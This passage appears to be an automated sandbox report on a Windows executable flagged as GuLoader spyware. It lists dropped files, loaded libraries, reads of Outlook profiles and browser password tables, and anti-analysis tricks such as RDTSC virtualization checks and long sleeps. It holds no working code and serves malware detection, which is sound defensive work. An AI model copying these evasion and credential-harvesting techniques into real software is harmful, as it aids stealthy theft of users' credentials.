            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CD18417_2_35CD1841
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CD00407_2_35CD0040
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CDF0717_2_35CDF071
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CD00067_2_35CD0006
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CDEC187_2_35CDEC18
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CDEC287_2_35CDEC28
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CDE7C07_2_35CDE7C0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CDE7D07_2_35CDE7D0
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CD1F9C7_2_35CD1F9C
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CDE36D7_2_35CDE36D
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CDE3787_2_35CDE378
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CDDF117_2_35CDDF11
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CDDF207_2_35CDDF20
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CD0B207_2_35CD0B20
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CD0B307_2_35CD0B30
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CDDAC87_2_35CDDAC8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CD2A807_2_35CD2A80
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CDDAB97_2_35CDDAB9
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CDD6607_2_35CDD660
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CDD6707_2_35CDD670
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CDD2097_2_35CDD209
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_35CDD2187_2_35CDD218
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: String function: 00402B38 appears 47 times
            Source: GBYfjUz4a5.exe, 00000000.00000002.1543653473.000000000044D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenametoggler triumvirates.exe4 vs GBYfjUz4a5.exe
            Source: GBYfjUz4a5.exe, 00000007.00000000.1540645122.000000000044D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenametoggler triumvirates.exe4 vs GBYfjUz4a5.exe
            Source: GBYfjUz4a5.exe, 00000007.00000002.2482541121.0000000002FA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs GBYfjUz4a5.exe
            Source: GBYfjUz4a5.exe, 00000007.00000002.2504931204.00000000331C7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs GBYfjUz4a5.exe
            Source: GBYfjUz4a5.exeBinary or memory string: OriginalFilenametoggler triumvirates.exe4 vs GBYfjUz4a5.exe
            Source: GBYfjUz4a5.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/30@5/5
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 0_2_004045C8 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004045C8
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerneJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeMutant created: NULL
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile created: C:\Users\user\AppData\Local\Temp\nsiE214.tmpJump to behavior
            Source: GBYfjUz4a5.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.00000000335D0000.00000004.00000800.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2505203474.00000000335F6000.00000004.00000800.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033602000.00000004.00000800.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2505203474.00000000335C2000.00000004.00000800.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2505203474.00000000335B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: GBYfjUz4a5.exeVirustotal: Detection: 67%
            Source: GBYfjUz4a5.exeReversingLabs: Detection: 50%
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile read: C:\Users\user\Desktop\GBYfjUz4a5.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\GBYfjUz4a5.exe "C:\Users\user\Desktop\GBYfjUz4a5.exe"
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess created: C:\Users\user\Desktop\GBYfjUz4a5.exe "C:\Users\user\Desktop\GBYfjUz4a5.exe"
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess created: C:\Users\user\Desktop\GBYfjUz4a5.exe "C:\Users\user\Desktop\GBYfjUz4a5.exe"Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Udtrttede.iniJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: GBYfjUz4a5.exeStatic file information: File size 1076355 > 1048576

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: Process Memory Space: GBYfjUz4a5.exe PID: 6292, type: MEMORYSTR
            Source: Yara matchFile source: 00000000.00000002.1545029670.0000000005E90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406252
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 0_2_10002DB0 push eax; ret 0_2_10002DDE
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02BD9C30 push esp; retf 02C4h7_2_02BD9D55
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02E30007 push edi; iretd 7_2_02E30016
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile created: C:\Users\user\AppData\Local\Temp\nst7D0.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerneJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Periwinkles.TweJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Litiscontest.jpgJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\bakteriologiske.BrnJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Tiggerstavens.fesJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Udgyd.iniJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Udtrttede.iniJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\aktioners.jpgJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\begrdeliges.proJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\burdie.iniJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\cartographer.jpgJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\ResorberedeJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Resorberede\histographies.txtJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Resorberede\icekhana.txtJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Resorberede\manxman.jpgJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Resorberede\modstaaet.jpgJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Resorberede\musicianer.spiJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Resorberede\ndder.jpgJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Resorberede\romantiserendes.iniJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Resorberede\semiquadrangle.iniJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Resorberede\sugarcane.jpgJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Resorberede\tinkle.jpgJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Resorberede\unagitatedness.txtJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeAPI/Special instruction interceptor: Address: 62C201A
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeAPI/Special instruction interceptor: Address: 262201A
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeRDTSC instruction interceptor: First address: 62585D8 second address: 62585D8 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F2394BB9B69h 0x00000006 test ax, dx 0x00000009 jmp 00007F2394BB9BC8h 0x0000000b inc ebp 0x0000000c test edi, 1E8ED3CBh 0x00000012 inc ebx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeRDTSC instruction interceptor: First address: 25B85D8 second address: 25B85D8 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F239539C839h 0x00000006 test ax, dx 0x00000009 jmp 00007F239539C898h 0x0000000b inc ebp 0x0000000c test edi, 1E8ED3CBh 0x00000012 inc ebx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeMemory allocated: 2BD0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeMemory allocated: 33360000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeMemory allocated: 35360000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeCode function: 7_2_02BD3E09 rdtsc 7_2_02BD3E09
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 599547Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 599438Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 599219Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 599000Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 598891Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 598672Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 598563Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 598438Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 598313Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 598188Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 598078Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 597969Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 597844Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 597735Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 597610Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 597485Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 597360Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 597235Jump to behavior
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exeThread delayed: delay time: 597110Jump to behavior
